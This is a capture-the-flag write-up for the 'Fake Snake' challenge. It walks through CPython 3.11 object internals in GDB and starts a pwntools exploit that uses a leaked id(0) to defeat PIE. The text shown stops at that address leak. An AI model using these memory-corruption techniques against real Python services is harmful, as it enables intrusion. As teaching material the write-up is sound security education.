Fake Snake
We are given this Python script that is executed in the remote instance:
#!/usr/bin/env python
from _ctypes import PyObj_FromPtr

storage = {}
commands = f'''
Zero: {id(0)}
0) Add To Store
1) Remove From Store
2) Load Address
'''.strip()

while True:
    print(commands)
    match(input('Selection:')):
        case '0':
            inp = input('To Add:')
            storage[id(inp)] = inp
            print(id(inp))
            del inp
        case '1':
            addr = input('To Remove:')
            if addr.isdecimal() and int(addr) in storage:
                del storage[int(addr)]
        case '2':
            addr = input('To Load:')
            if addr.isdecimal():
                print(PyObj_FromPtr(int(addr)))
            else:
                print('Invalid Address')
In addition, we have a Dockerfile:
FROM python@sha256:7ded8135894464123583e8a000e6e88aa8a114a634a3eebe8556d69f7e03ffc3
RUN apt update && \
apt install -y socat && \
rm -rf /var/lib/apt/lists/*
COPY challenge/server.py /
COPY challenge/flag.txt /
USER 1000
CMD ["socat", "tcp-l:1337,reuseaddr,fork", "EXEC:python3 -S ./server.py"]
There is no binary this time, so we must exploit the Python program using some Python internals primitives.
Setup environment
If we build the Docker image and run it in a container, we will see that we are dealing with Python 3.11.3:
# docker build -t pwn_fake_snake .
[+] Building 4.7s (9/9) FINISHED
=> [internal] load .dockerignore 0.0s
=> => transferring context: 2B 0.0s
=> [internal] load build definition from Dockerfile 0.0s
=> => transferring dockerfile: 344B 0.0s
=> [internal] load metadata for docker.io/library/python@sha256:7ded8135894464123583e8a000e6e88aa8a114a634a3eebe8556d69f7e03ffc3 0.0s
=> [1/4] FROM docker.io/library/python@sha256:7ded8135894464123583e8a000e6e88aa8a114a634a3eebe8556d69f7e03ffc3 1.9s
=> => resolve docker.io/library/python@sha256:7ded8135894464123583e8a000e6e88aa8a114a634a3eebe8556d69f7e03ffc3 0.0s
=> => sha256:7ded8135894464123583e8a000e6e88aa8a114a634a3eebe8556d69f7e03ffc3 1.37kB / 1.37kB 0.0s
=> => sha256:4c7870c9f1f753961c4e61166ecf70f851da452f8b5c098fceafe5a59f866daf 6.90kB / 6.90kB 0.0s
=> => sha256:9fbefa3370776b7ec7633cf07efc14cc24e0c0cd53893ad0e7e3f44ffdc1bedb 27.14MB / 27.14MB 1.1s
=> => sha256:a25702e0699eca20ab682bbfa60f6bb7775e4fb18ef65c038ffda342fdab9e3a 2.78MB / 2.78MB 0.5s
=> => sha256:970808dbe7d8b24a899ce97f54228fdc39129ac3098f4c519f34591f0a5bfb4c 11.98MB / 11.98MB 0.8s
=> => sha256:7ea720a5ba93c8f8ee2b7bab0d0de862fa1b8c3885409bbd9897a6ddbf3b507a 243B / 243B 0.9s
=> => sha256:7657e2f3a89a8d274a1e1f952b5112c88329d4ec172d66fcc25680409c802d35 3.37MB / 3.37MB 1.7s
=> => extracting sha256:9fbefa3370776b7ec7633cf07efc14cc24e0c0cd53893ad0e7e3f44ffdc1bedb 0.4s
=> => extracting sha256:a25702e0699eca20ab682bbfa60f6bb7775e4fb18ef65c038ffda342fdab9e3a 0.1s
=> => extracting sha256:970808dbe7d8b24a899ce97f54228fdc39129ac3098f4c519f34591f0a5bfb4c 0.2s
=> => extracting sha256:7ea720a5ba93c8f8ee2b7bab0d0de862fa1b8c3885409bbd9897a6ddbf3b507a 0.0s
=> => extracting sha256:7657e2f3a89a8d274a1e1f952b5112c88329d4ec172d66fcc25680409c802d35 0.1s
=> [internal] load build context 0.0s
=> => transferring context: 107B 0.0s
=> [2/4] RUN apt update && apt install -y socat && rm -rf /var/lib/apt/lists/* 2.6s
=> [3/4] COPY challenge/server.py / 0.0s
=> [4/4] COPY challenge/flag.txt / 0.0s
=> exporting to image 0.0s
=> => exporting layers 0.0s
=> => writing image sha256:97cb8e5f57ae290a28118c93ce8c81871c2aa32f7ba21e5e6ab8ebe01b139f88 0.0s
=> => naming to docker.io/library/pwn_fake_snake 0.0s
# docker run --rm -it pwn_fake_snake bash
I have no name!@38883a7537ad:/$ python3 --version
Python 3.11.3
I have no name!@38883a7537ad:/$ exit
exit
Since we will be dealing with Python objects in memory and other Python internals, it is handy to build Python 3.11 from source to have symbols in GDB (I used make altinstall to keep my default Python version):
# cd /opt
# git clone https://github.com/python/cpython.git
Cloning into 'cpython'...
remote: Enumerating objects: 946090, done.
remote: Counting objects: 100% (1385/1385), done.
remote: Compressing objects: 100% (794/794), done.
remote: Total 946090 (delta 860), reused 939 (delta 589), pack-reused 944705
Receiving objects: 100% (946090/946090), 559.96 MiB | 29.98 MiB/s, done.
Resolving deltas: 100% (749546/749546), done.
# cd cpython
# git switch 3.11
Branch '3.11' set up to track remote branch '3.11' from 'origin'.
Switched to a new branch '3.11'
# ./configure
...
# make
...
# make altinstall
...
# python3 --version
Python 3.8.10
# python3.11 --version
Python 3.11.3+
The Python Developer’s Guide recommends using python-gdb.py to get some extra functionality in GDB:
$ echo 'add-auto-load-safe-path /opt/cpython/python-gdb.py' >> ~/.gdbinit
Nevertheless, I didn’t use it; plain GDB with gef was enough.
Source code analysis
The first thing that looks interesting in the script is the use of PyObj_FromPtr from _ctypes. This function takes an address and returns the Python object located there, without checking that the address really holds a valid object. The use of id is the other interesting piece: in CPython, it returns the memory address of a given Python object, so the two functions are inverses of each other.
For instance, we have id(0) in the menu:
commands = f'''
Zero: {id(0)}
0) Add To Store
1) Remove From Store
2) Load Address
'''.strip()
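To see that id and PyObj_FromPtr undo each other, here is a minimal sketch that can be pasted in a REPL. It assumes CPython (where id returns the object's address); the names obj, addr and same are only illustrative:

```python
from _ctypes import PyObj_FromPtr

obj = ['any', 'python', 'object']
addr = id(obj)               # on CPython, id() is the object's memory address
same = PyObj_FromPtr(addr)   # reinterpret that address as a Python object

# No copy is made: we get back the very same object.
print(hex(addr), same is obj)
```

The address is not validated in any way, which is exactly what the challenge lets us abuse later.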
The program creates a dict object called storage. Then, we have three options:
Allocation function
We can add a str object, and the dict object will hold the address of the str as key and the str itself as value:
case '0':
    inp = input('To Add:')
    storage[id(inp)] = inp
    print(id(inp))
    del inp
Free function
With option 1 we can indicate a key (actually an address) to remove it from the dict object:
case '1':
    addr = input('To Remove:')
    if addr.isdecimal() and int(addr) in storage:
        del storage[int(addr)]
Actually, I didn’t use this function in the exploit.
Information function
Finally, we have the chance to load any Python object as long as we know the exact memory address where it is allocated:
case '2':
    addr = input('To Load:')
    if addr.isdecimal():
        print(PyObj_FromPtr(int(addr)))
    else:
        print('Invalid Address')
Learning Python internals
I was new to Python internals, so I needed to play a bit with the Python REPL inside GDB to observe how Python objects are stored in memory. To do so, I wrote a Python script similar to the challenge, with its three options turned into functions that can be called from the REPL:
from _ctypes import PyObj_FromPtr

storage = {}
print(f'Zero: {id(0)}')

def add(inp):
    storage[id(inp)] = inp
    print(id(inp))
    del inp

def remove(addr):
    if addr.isdecimal() and int(addr) in storage:
        del storage[int(addr)]
        print('removed')

def load(addr):
    if addr.isdecimal():
        print(PyObj_FromPtr(int(addr)))
    else:
        print('Invalid Address')
Now we can debug python3.11 as a binary and run it with the -i flag to get a REPL once the code is loaded:
$ gdb -q python3.11
Reading symbols from python3.11...
gef➤ run -i test.py
Starting program: /usr/local/bin/python3.11 -i test.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Zero: 93824997988328
>>>
While solving the challenge, I found some useful resources to learn Python internals:
- Let’s break CPython together, for fun and mischief
- Exploiting a Use-After-Free for code execution in every version of Python 3
- cpython
- Exploring the Internals
Python objects
After reading some resources on Python internals, we will see that the relevant structure is PyObject (aliased from _object, which is defined here):
/* Nothing is actually declared to be a PyObject, but every pointer to
* a Python object can be cast to a PyObject*. This is inheritance built
* by hand. Similarly every pointer to a variable-size Python object can,
* in addition, be cast to PyVarObject*.
*/
struct _object {
_PyObject_HEAD_EXTRA
Py_ssize_t ob_refcnt;
PyTypeObject *ob_type;
};
For instance, we can parse the address printed by id(0) as a PyObject in GDB:
gef➤ p *(PyObject *) 93824997988328
$1 = {
ob_refcnt = 0x3b9acc52,
ob_type = 0x5555559db5a0 <PyLong_Type>
}
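As can be seen, there is an ob_refcnt field that holds the number of references to this object and a pointer to the type object (PyLong_Type). The count is huge not only because 0 is widely used in a program: CPython 3.11 initializes statically allocated objects like this one with a reference count of 999999999 (0x3b9ac9ff), so the value shown is that baseline plus the live references. We can be more specific and parse the object as PyLongObject to see more information: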
gef➤ p *(PyLongObject *) 93824997988328
$2 = {
ob_base = {
ob_base = {
ob_refcnt = 0x3b9acc52,
ob_type = 0x5555559db5a0 <PyLong_Type>
},
ob_size = 0x0
},
ob_digit = {0x0}
}
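The same two header fields can be read without GDB. The following is a rough sketch using ctypes; it assumes a standard (non-debug, non-free-threaded) CPython build, where ob_refcnt is the first word of the object and ob_type the second. The helper read_header is a name made up for this example:

```python
import ctypes

WORD = ctypes.sizeof(ctypes.c_ssize_t)

def read_header(obj):
    """Return (ob_refcnt, ob_type) read straight from the object's memory."""
    addr = id(obj)
    refcnt = ctypes.c_ssize_t.from_address(addr).value
    # Assumption: ob_type is the pointer-sized field right after ob_refcnt.
    type_ptr = ctypes.c_void_p.from_address(addr + WORD).value
    return refcnt, type_ptr

refcnt, type_ptr = read_header(0)
# The type pointer of 0 should be the address of the int type (PyLong_Type).
print(hex(refcnt), hex(type_ptr), type_ptr == id(int))
```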
The int value 0 is initialized in memory when the program starts. This was a decision from the developers to improve performance, since this Python object will be used a lot. In fact, all integers from -5 to 256 (inclusive) are preallocated in the same way:
gef➤ x/30gx 93824997988328
0x555555ad17e8 <_PyRuntime+840>: 0x000000003b9acc52 0x00005555559db5a0
0x555555ad17f8 <_PyRuntime+856>: 0x0000000000000000 0x0000000000000000
0x555555ad1808 <_PyRuntime+872>: 0x000000003b9acae7 0x00005555559db5a0
0x555555ad1818 <_PyRuntime+888>: 0x0000000000000001 0x0000000000000001
0x555555ad1828 <_PyRuntime+904>: 0x000000003b9aca8c 0x00005555559db5a0
0x555555ad1838 <_PyRuntime+920>: 0x0000000000000001 0x0000000000000002
0x555555ad1848 <_PyRuntime+936>: 0x000000003b9aca3c 0x00005555559db5a0
0x555555ad1858 <_PyRuntime+952>: 0x0000000000000001 0x0000000000000003
0x555555ad1868 <_PyRuntime+968>: 0x000000003b9aca55 0x00005555559db5a0
0x555555ad1878 <_PyRuntime+984>: 0x0000000000000001 0x0000000000000004
0x555555ad1888 <_PyRuntime+1000>: 0x000000003b9aca27 0x00005555559db5a0
0x555555ad1898 <_PyRuntime+1016>: 0x0000000000000001 0x0000000000000005
0x555555ad18a8 <_PyRuntime+1032>: 0x000000003b9aca1e 0x00005555559db5a0
0x555555ad18b8 <_PyRuntime+1048>: 0x0000000000000001 0x0000000000000006
0x555555ad18c8 <_PyRuntime+1064>: 0x000000003b9aca18 0x00005555559db5a0
gef➤ p *(PyLongObject *) 0x555555ad18a8
$3 = {
ob_base = {
ob_base = {
ob_refcnt = 0x3b9aca1e,
ob_type = 0x5555559db5a0 <PyLong_Type>
},
ob_size = 0x1
},
ob_digit = {0x6}
}
This will be useful for exploitation because these objects are stored in the binary (note that the address starts with 0x555555 because GDB disables ASLR). Therefore, having the address of 0 directly gives us the base address of the binary, which is enough to bypass PIE.
Let’s continue exploring. It is well known that strings in Python are immutable, so let’s see what we have:
>>> add('a')
93824997520288
>>> id('a')
93824997520288
gef➤ p *(PyObject *) 93824997520288
$4 = {
ob_refcnt = 0x3b9aca08,
ob_type = 0x5555559e51a0 <PyUnicode_Type>
}
It shows PyUnicode_Type. We can parse it as a PyUnicodeObject:
gef➤ p *(PyUnicodeObject *) 93824997520288
$5 = {
_base = {
_base = {
ob_base = {
ob_refcnt = 0x3b9aca08,
ob_type = 0x5555559e51a0 <PyUnicode_Type>
},
length = 0x1,
hash = 0x806980da7df19e68,
state = {
interned = 0x1,
kind = 0x1,
compact = 0x1,
ascii = 0x1,
ready = 0x1
},
wstr = 0x0
},
utf8_length = 0x61,
utf8 = 0x0,
wstr_length = 0x3b9ac9ff
},
data = {
any = 0x5555559cbac0 <PyBytes_Type>,
latin1 = 0x5555559cbac0 <PyBytes_Type> "J",
ucs2 = 0x5555559cbac0 <PyBytes_Type>,
ucs4 = 0x5555559cbac0 <PyBytes_Type>
}
}
But it looks a bit weird. In fact, the ASCII value for a is 0x61, and it appears as utf8_length… That does not make sense. If we take a look at unicodeobject.h, we see that there are other structures for str objects, such as PyASCIIObject, which is the one used for compact ASCII-only strings:
gef➤ p *(PyASCIIObject *) 93824997520288
$6 = {
ob_base = {
ob_refcnt = 0x3b9aca08,
ob_type = 0x5555559e51a0 <PyUnicode_Type>
},
length = 0x1,
hash = 0x846afae1d6f9bca6,
state = {
interned = 0x1,
kind = 0x1,
compact = 0x1,
ascii = 0x1,
ready = 0x1
},
wstr = 0x0
}
gef➤ x/8gx 93824997520288
0x555555a5f3a0 <const_str_a>: 0x000000003b9aca08 0x00005555559e51a0
0x555555a5f3b0 <const_str_a+16>: 0x0000000000000001 0x846afae1d6f9bca6
0x555555a5f3c0 <const_str_a+32>: 0x00000000000000e5 0x0000000000000000
0x555555a5f3d0 <const_str_a+48>: 0x0000000000000061 0x0000000000000000
As stated in the source code, the actual string data is stored right after the struct (here, the byte 0x61 at offset 0x30). As happened with the value 0, this string also lives at a fixed address inside the binary (note the const_str_a symbol), so it is available from startup.
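We can double check where the characters of an ASCII string live with a small ctypes sketch. It assumes a compact ASCII str on a standard CPython build, and it derives the header size from sys.getsizeof('') (header plus the trailing NUL byte) instead of hard-coding it, because the size changes between versions (on 3.11 it should give 0x30). ASCII_HEADER and raw_ascii_data are hypothetical names:

```python
import ctypes
import sys

# Size of the PyASCIIObject header on this interpreter:
# sys.getsizeof('') counts the header plus one NUL terminator.
ASCII_HEADER = sys.getsizeof('') - 1

def raw_ascii_data(s):
    """Read the bytes stored right after the header of an ASCII str."""
    if not s.isascii():
        raise ValueError('only compact ASCII strings use this layout')
    return ctypes.string_at(id(s) + ASCII_HEADER, len(s))

sample = 'asdf'
print(hex(ASCII_HEADER), raw_ascii_data(sample))
```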
Now, let’s see how dict objects are stored. Let’s use storage as an example:
>>> storage
{93824997520288: 'a'}
>>> id(storage)
140737339407232
gef➤ p *(PyObject *) 140737339407232
$7 = {
ob_refcnt = 0x1,
ob_type = 0x5555559dc640 <PyDict_Type>
}
Specifically, this is a PyDictObject:
gef➤ p *(PyDictObject *) 140737339407232
$8 = {
ob_base = {
ob_refcnt = 0x1,
ob_type = 0x5555559dc640 <PyDict_Type>
},
ma_used = 0x1,
ma_version_tag = 0x66ec,
ma_keys = 0x7ffff70dec90,
ma_values = 0x0
}
This is the definition of PyDictObject:
typedef struct _dictkeysobject PyDictKeysObject;
typedef struct _dictvalues PyDictValues;
/* The ma_values pointer is NULL for a combined table
* or points to an array of PyObject* for a split table
*/
typedef struct {
PyObject_HEAD
/* Number of items in the dictionary */
Py_ssize_t ma_used;
/* Dictionary version: globally unique, value change each time
the dictionary is modified */
uint64_t ma_version_tag;
PyDictKeysObject *ma_keys;
/* If ma_values is NULL, the table is "combined": keys and values
are stored in ma_keys.
If ma_values is not NULL, the table is split:
keys are stored in ma_keys and values are stored in ma_values */
PyDictValues *ma_values;
} PyDictObject;
It is a bit confusing since ma_values may or may not point to an array of values. However, this is not relevant for exploitation. Let’s see what we have in ma_keys:
gef➤ p *(PyDictKeysObject *) 0x7ffff70dec90
$9 = {
dk_refcnt = 0x1,
dk_log2_size = 0x3,
dk_log2_index_bytes = 0x3,
dk_kind = 0x0,
dk_version = 0x0,
dk_usable = 0x4,
dk_nentries = 0x1,
dk_indices = 0x7ffff70decb0 ""
}
This is the relevant structure:
/* See dictobject.c for actual layout of DictKeysObject */
struct _dictkeysobject {
Py_ssize_t dk_refcnt;
/* Size of the hash table (dk_indices). It must be a power of 2. */
uint8_t dk_log2_size;
/* Size of the hash table (dk_indices) by bytes. */
uint8_t dk_log2_index_bytes;
/* Kind of keys */
uint8_t dk_kind;
/* Version number -- Reset to 0 by any modification to keys */
uint32_t dk_version;
/* Number of usable entries in dk_entries. */
Py_ssize_t dk_usable;
/* Number of used entries in dk_entries. */
Py_ssize_t dk_nentries;
/* Actual hash table of dk_size entries. It holds indices in dk_entries,
or DKIX_EMPTY(-1) or DKIX_DUMMY(-2).
Indices must be: 0 <= indice < USABLE_FRACTION(dk_size).
The size in bytes of an indice depends on dk_size:
- 1 byte if dk_size <= 0xff (char*)
- 2 bytes if dk_size <= 0xffff (int16_t*)
- 4 bytes if dk_size <= 0xffffffff (int32_t*)
- 8 bytes otherwise (int64_t*)
Dynamically sized, SIZEOF_VOID_P is minimum. */
char dk_indices[]; /* char is required to avoid strict aliasing. */
/* "PyDictKeyEntry or PyDictUnicodeEntry dk_entries[USABLE_FRACTION(DK_SIZE(dk))];" array follows:
see the DK_ENTRIES() macro */
};
Curiously, dk_indices is a char[]. Let’s add another item to storage:
>>> add('asdf')
140737338225328
Just to verify, let’s see if we can parse this string correctly:
gef➤ p *(PyASCIIObject *) 140737338225328
$10 = {
ob_base = {
ob_refcnt = 0x1,
ob_type = 0x5555559e51a0 <PyUnicode_Type>
},
length = 0x4,
hash = 0xad8cd6c17573b37b,
state = {
interned = 0x1,
kind = 0x1,
compact = 0x1,
ascii = 0x1,
ready = 0x1
},
wstr = 0x0
}
gef➤ x/8gx 140737338225328
0x7ffff70d32b0: 0x0000000000000001 0x00005555559e51a0
0x7ffff70d32c0: 0x0000000000000004 0xad8cd6c17573b37b
0x7ffff70d32d0: 0x01650065000200e5 0x0000000000000000
0x7ffff70d32e0: 0x3333370066647361 0x0032333237303439
gef➤ telescope 140737338225328
0x00007ffff70d32b0│+0x0000: 0x0000000000000001
0x00007ffff70d32b8│+0x0008: 0x00005555559e51a0 → 0x000000000000005a ("Z"?)
0x00007ffff70d32c0│+0x0010: 0x0000000000000004
0x00007ffff70d32c8│+0x0018: 0xad8cd6c17573b37b
0x00007ffff70d32d0│+0x0020: 0x01650065000200e5
0x00007ffff70d32d8│+0x0028: 0x0000000000000000
0x00007ffff70d32e0│+0x0030: 0x3333370066647361 ("asdf"?)
0x00007ffff70d32e8│+0x0038: 0x0032333237303439 ("9407232"?)
0x00007ffff70d32f0│+0x0040: 0x00007ffff70d3330 → 0x00007ffff70d3370 → 0x0000000000000000
0x00007ffff70d32f8│+0x0048: 0x00005555559e51a0 → 0x000000000000005a ("Z"?)
If we look now at dk_indices of storage, we have this:
gef➤ x/10gx 0x7ffff70decb0
0x7ffff70decb0: 0xff01ffffffffff00 0x0000555555a5f3a0
0x7ffff70decc0: 0x00007ffff726afb0 0x0000555555a5f3a0
0x7ffff70decd0: 0x00007ffff70d32b0 0x00007ffff726afd0
0x7ffff70dece0: 0x00007ffff70d32b0 0x0000000000000000
0x7ffff70decf0: 0x0000000000000000 0x0000000000000000
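It looks very weird because the index table, the keys, and the values are all stored here. Actually, this is the hash table: the first 8 bytes (0xff01ffffffffff00) are the one-byte indices, and they are followed by the entries, each made of three words (hash, key, and value). In the first entry, 0x0000555555a5f3a0 is the hash of the key (an int this small hashes to itself), and 0x00007ffff726afb0 points to the key, which is a PyLongObject: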
gef➤ p *(PyObject *) 0x00007ffff726afb0
$11 = {
ob_refcnt = 0x1,
ob_type = 0x5555559db5a0 <PyLong_Type>
}
gef➤ p *(PyLongObject *) 0x00007ffff726afb0
$12 = {
ob_base = {
ob_base = {
ob_refcnt = 0x1,
ob_type = 0x5555559db5a0 <PyLong_Type>
},
ob_size = 0x2
},
ob_digit = {0x15a5f3a0}
}
Here I noticed that the int value shown is 0x15a5f3a0, which is very similar to 0x0000555555a5f3a0. Actually, it is the lower 30 bits of the address:
gef➤ p/x 0x0000555555a5f3a0 & 0x3fffffff
$13 = 0x15a5f3a0
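So ob_digit is not a hash: CPython stores an int as an array of 30-bit digits, and GDB only prints the first one (ob_size = 0x2 tells us that there are two). The PyLongObject is the key of the entry, an int holding the address of 'a'. The word that follows, 0x0000555555a5f3a0, is the value of the entry, that is, a pointer to the 'a' string itself. It matches the key only because storage uses the address of the str object as key. This is the key object of the second entry: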
gef➤ p *(PyObject *) 0x00007ffff726aff0
$14 = {
ob_refcnt = 0x1,
ob_type = 0x5555559db5a0 <PyLong_Type>
}
gef➤ p *(PyLongObject *) 0x00007ffff726aff0
$15 = {
ob_base = {
ob_base = {
ob_refcnt = 0x1,
ob_type = 0x5555559db5a0 <PyLong_Type>
},
ob_size = 0x2
},
ob_digit = {0x370d31f0}
}
gef➤ p/x 0x00007ffff70d31f0 & 0x3fffffff
$16 = 0x370d31f0
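The masking done in GDB is just the split of an int into 30-bit digits. As a quick sketch (assuming a 64-bit CPython build, where sys.int_info.bits_per_digit is 30 and integers below 2**61 - 1 hash to themselves), we can reproduce it in plain Python with the address of 'a' taken from the dump:

```python
import sys

addr = 0x0000555555a5f3a0   # key of the first entry (address of 'a')

bits = 30                   # digit width assumed here; compare with sys.int_info
mask = (1 << bits) - 1
digits = [addr & mask, addr >> bits]   # least significant digit first

print(sys.int_info.bits_per_digit)
print([hex(d) for d in digits])        # the first digit is what GDB showed as ob_digit
print(hash(addr) == addr)              # the hash stored in the dict entry
```

The first digit is 0x15a5f3a0, the value that GDB printed, and the two digits together rebuild the full address.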
If we delete a key, its entry is zeroed out in memory and its index slot is marked as a dummy (0xfe):
>>> storage
{93824997520288: 'a', 140737338225328: 'asdf'}
>>> remove('93824997520288')
removed
>>> storage
{140737338225328: 'asdf'}
gef➤ x/10gx 0x7ffff70decb0
0x7ffff70decb0: 0xffff01fffffffffe 0x0000000000000000
0x7ffff70decc0: 0x0000000000000000 0x0000000000000000
0x7ffff70decd0: 0x00007ffff70d32b0 0x00007ffff726afd0
0x7ffff70dece0: 0x00007ffff70d32b0 0x0000000000000000
0x7ffff70decf0: 0x0000000000000000 0x0000000000000000
Fake objects
While reading Exploiting a Use-After-Free for code execution in every version of Python 3, I understood that in order to exploit a Python application, one way is to craft fake objects in memory to confuse Python (similar to JavaScript exploits for browsers).
There are two similar structures that are mentioned in the article: bytearray and bytes.
>>> x = bytearray([1, 2, 3, 4, 5])
>>> id(x)
140737338225200
>>> y = bytes([1, 2, 3, 4, 5])
>>> id(y)
140737338064160
They behave like this in memory:
gef➤ p *(PyObject *) 140737338064160
$17 = {
ob_refcnt = 0x1,
ob_type = 0x5555559cbac0 <PyBytes_Type>
}
gef➤ p *(PyBytesObject *) 140737338064160
$18 = {
ob_base = {
ob_base = {
ob_refcnt = 0x1,
ob_type = 0x5555559cbac0 <PyBytes_Type>
},
ob_size = 0x5
},
ob_shash = 0xffffffffffffffff,
ob_sval = "\001"
}
gef➤ p *(PyObject *) 140737338225200
$19 = {
ob_refcnt = 0x1,
ob_type = 0x5555559cac60 <PyByteArray_Type>
}
gef➤ p *(PyByteArrayObject *) 140737338225200
$20 = {
ob_base = {
ob_base = {
ob_refcnt = 0x1,
ob_type = 0x5555559cac60 <PyByteArray_Type>
},
ob_size = 0x5
},
ob_alloc = 0x6,
ob_bytes = 0x7ffff73d85f0 "\001\002\003\004\005",
ob_start = 0x7ffff73d85f0 "\001\002\003\004\005",
ob_exports = 0x0
}
The difference between bytearray and bytes objects is that the former is mutable, whereas the latter is immutable. Notice that both of them have a field named ob_size that indicates the length of the object.
The program allows us to show these objects with option 2:
>>> load('140737338225200')
bytearray(b'\x01\x02\x03\x04\x05')
>>> load('140737338064160')
b'\x01\x02\x03\x04\x05'
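Since ob_size is what tells Python how long these objects are, it is worth locating it precisely. A minimal sketch, assuming the usual PyVarObject layout (ob_refcnt, ob_type, ob_size, one machine word each) on a standard CPython build; the helper ob_size is only illustrative:

```python
import ctypes

WORD = ctypes.sizeof(ctypes.c_ssize_t)

def ob_size(obj):
    # Assumed layout: ob_refcnt at +0, ob_type at +WORD, ob_size at +2*WORD
    return ctypes.c_ssize_t.from_address(id(obj) + 2 * WORD).value

x = bytearray([1, 2, 3, 4, 5])
y = bytes([1, 2, 3, 4, 5])
print(ob_size(x), ob_size(y), len(x), len(y))
```

On a 64-bit build the field is at offset 0x10, the third word of the object.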
With all this knowledge, let’s start with the exploit.
Exploit development
I will use these helper functions:
def add(p, inp: bytes) -> int:
    p.sendlineafter(b'Selection:', b'0')
    p.sendlineafter(b'To Add:', inp)
    return int(p.recvline().decode())

def remove(p, addr: int):
    p.sendlineafter(b'Selection:', b'1')
    p.sendlineafter(b'To Remove:', str(addr).encode())

def load(p, addr: int, do_recv: bool = True) -> bytes:
    p.sendlineafter(b'Selection:', b'2')
    p.sendlineafter(b'To Load:', str(addr).encode())
    return p.recvline() if do_recv else b''
First of all, the program gives us a memory leak of the int value 0 (we could have also used the address of 'a'):
>>> id(0)
93824997988328
And this address is within the binary, so we can get the offset and find the base address of the binary:
gef➤ vmmap
[ Legend: Code | Heap | Stack ]
Start End Offset Perm Path
0x0000555555554000 0x0000555555641000 0x0000000000000000 r-- /usr/local/bin/python3.11
0x0000555555641000 0x00005555558b5000 0x00000000000ed000 r-x /usr/local/bin/python3.11
0x00005555558b5000 0x000055555599b000 0x0000000000361000 r-- /usr/local/bin/python3.11
0x000055555599b000 0x00005555559ca000 0x0000000000446000 r-- /usr/local/bin/python3.11
0x00005555559ca000 0x0000555555afa000 0x0000000000475000 rw- /usr/local/bin/python3.11
0x0000555555afa000 0x0000555555ca3000 0x0000000000000000 rw- [heap]
0x00007ffff6ff3000 0x00007ffff6ff5000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/libffi.so.7.1.0
0x00007ffff6ff5000 0x00007ffff6ffb000 0x0000000000002000 r-x /usr/lib/x86_64-linux-gnu/libffi.so.7.1.0
0x00007ffff6ffb000 0x00007ffff6ffc000 0x0000000000008000 r-- /usr/lib/x86_64-linux-gnu/libffi.so.7.1.0
0x00007ffff6ffc000 0x00007ffff6ffd000 0x0000000000009000 --- /usr/lib/x86_64-linux-gnu/libffi.so.7.1.0
0x00007ffff6ffd000 0x00007ffff6ffe000 0x0000000000009000 r-- /usr/lib/x86_64-linux-gnu/libffi.so.7.1.0
0x00007ffff6ffe000 0x00007ffff6fff000 0x000000000000a000 rw- /usr/lib/x86_64-linux-gnu/libffi.so.7.1.0
0x00007ffff6fff000 0x00007ffff7006000 0x0000000000000000 r-- /usr/local/lib/python3.11/lib-dynload/_ctypes.cpython-311-x86_64-linux-gnu.so
0x00007ffff7006000 0x00007ffff7017000 0x0000000000007000 r-x /usr/local/lib/python3.11/lib-dynload/_ctypes.cpython-311-x86_64-linux-gnu.so
0x00007ffff7017000 0x00007ffff701d000 0x0000000000018000 r-- /usr/local/lib/python3.11/lib-dynload/_ctypes.cpython-311-x86_64-linux-gnu.so
0x00007ffff701d000 0x00007ffff701e000 0x000000000001d000 r-- /usr/local/lib/python3.11/lib-dynload/_ctypes.cpython-311-x86_64-linux-gnu.so
0x00007ffff701e000 0x00007ffff7022000 0x000000000001e000 rw- /usr/local/lib/python3.11/lib-dynload/_ctypes.cpython-311-x86_64-linux-gnu.so
0x00007ffff7022000 0x00007ffff7155000 0x0000000000000000 rw-
0x00007ffff7155000 0x00007ffff7163000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/libtinfo.so.6.2
...
0x00007ffff7ffc000 0x00007ffff7ffd000 0x000000000002c000 r-- /usr/lib/x86_64-linux-gnu/ld-2.31.so
0x00007ffff7ffd000 0x00007ffff7ffe000 0x000000000002d000 rw- /usr/lib/x86_64-linux-gnu/ld-2.31.so
0x00007ffff7ffe000 0x00007ffff7fff000 0x0000000000000000 rw-
0x00007ffffffde000 0x00007ffffffff000 0x0000000000000000 rw- [stack]
0xffffffffff600000 0xffffffffff601000 0x0000000000000000 --x [vsyscall]
gef➤ p/x 93824997988328
$21 = 0x555555ad17e8
gef➤ p/d 0x555555ad17e8 - 0x0000555555554000
$22 = 5756904
So, we can use this code:
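from pwn import *  # pwntools: process, gdb, ELF, p64

def main():
    p = process(['python3.11', 'challenge/server.py'], level='DEBUG')
    gdb.attach(p, 'continue')

    # The menu leaks id(0), an address inside the python3.11 binary
    p.recvuntil(b'Zero: ')
    zero_addr = int(p.recvline())
    p.info(f'id(0) = {hex(zero_addr)}')

    # 5756904 is the offset of the int 0 object from the base of the binary
    python_base_addr = zero_addr - 5756904
    p.success(f'Python base address: {hex(python_base_addr)}')

    p.interactive()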
$ python3 solve.py
[+] Starting local process '/usr/local/bin/python3.11' argv=[b'python3.11', b'challenge/server.py'] : pid 737816
[*] running in new terminal: ['/usr/bin/gdb', '-q', '/usr/local/bin/python3.11', '737816', '-x', '/tmp/pwnpwdk5bfs.gdb']
[+] Waiting for debugger: Done
[DEBUG] Received 0x54 bytes:
b'Zero: 94128788563944\n'
b'0) Add To Store\n'
b'1) Remove From Store\n'
b'2) Load Address\n'
b'Selection:'
[*] id(0) = 0x559c110167e8
[+] Python base address: 0x559c10a99000
[*] Switching to interactive mode
1) Add To Store
2) Remove From Store
3) Load Address
Selection:$
And the base address of the binary looks correct:
gef➤ vmmap
[ Legend: Code | Heap | Stack ]
Start End Offset Perm Path
0x0000559c10a99000 0x0000559c10b86000 0x0000000000000000 r-- /usr/local/bin/python3.11
0x0000559c10b86000 0x0000559c10dfa000 0x00000000000ed000 r-x /usr/local/bin/python3.11
0x0000559c10dfa000 0x0000559c10ee0000 0x0000000000361000 r-- /usr/local/bin/python3.11
0x0000559c10ee0000 0x0000559c10f0f000 0x0000000000446000 r-- /usr/local/bin/python3.11
0x0000559c10f0f000 0x0000559c1103f000 0x0000000000475000 rw- /usr/local/bin/python3.11
0x0000559c1103f000 0x0000559c11082000 0x0000000000000000 rw-
0x0000559c12df3000 0x0000559c12e8e000 0x0000000000000000 rw- [heap]
0x00007fc6f92e5000 0x00007fc6f92ec000 0x0000000000000000 r-- /usr/local/lib/python3.11/lib-dynload/_ctypes.cpython-311-x86_64-linux-gnu.so
